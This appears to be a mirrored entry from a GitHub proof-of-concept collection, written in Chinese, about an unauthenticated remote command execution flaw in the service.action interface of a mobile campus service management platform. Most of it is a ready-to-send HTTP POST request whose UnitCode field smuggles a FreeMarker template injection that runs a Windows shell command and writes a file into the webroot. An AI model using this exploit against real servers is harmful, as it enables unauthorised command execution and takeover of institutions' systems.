mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-05 02:15:30 +00:00
25 lines
1.1 KiB
Markdown
25 lines
1.1 KiB
Markdown
|
||
## 新开普掌上校园服务管理平台service.action远程命令执行
|
||
新开普掌上校园服务管理平台service.action接口处存在远程命令执行漏洞,攻击者可在未经身份认证的情况下,调用后台接口,执行恶意系统命令。
|
||
|
||
## POC
|
||
```
|
||
POST /service_transport/service.action HTTP/1.1
|
||
Host:
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
|
||
Connection: close
|
||
Content-Length: 211
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
|
||
Accept-Encoding: gzip, deflate
|
||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
|
||
Upgrade-Insecure-Requests: 1
|
||
|
||
{ "command": "GetFZinfo", "UnitCode": "<#assign ex = "freemarker.template.utility.Execute" ?new()>${ex("cmd /c echo 123 >./webapps/ROOT/test.txt")}"}
|
||
|
||
```
|
||
|
||

|
||

|
||
|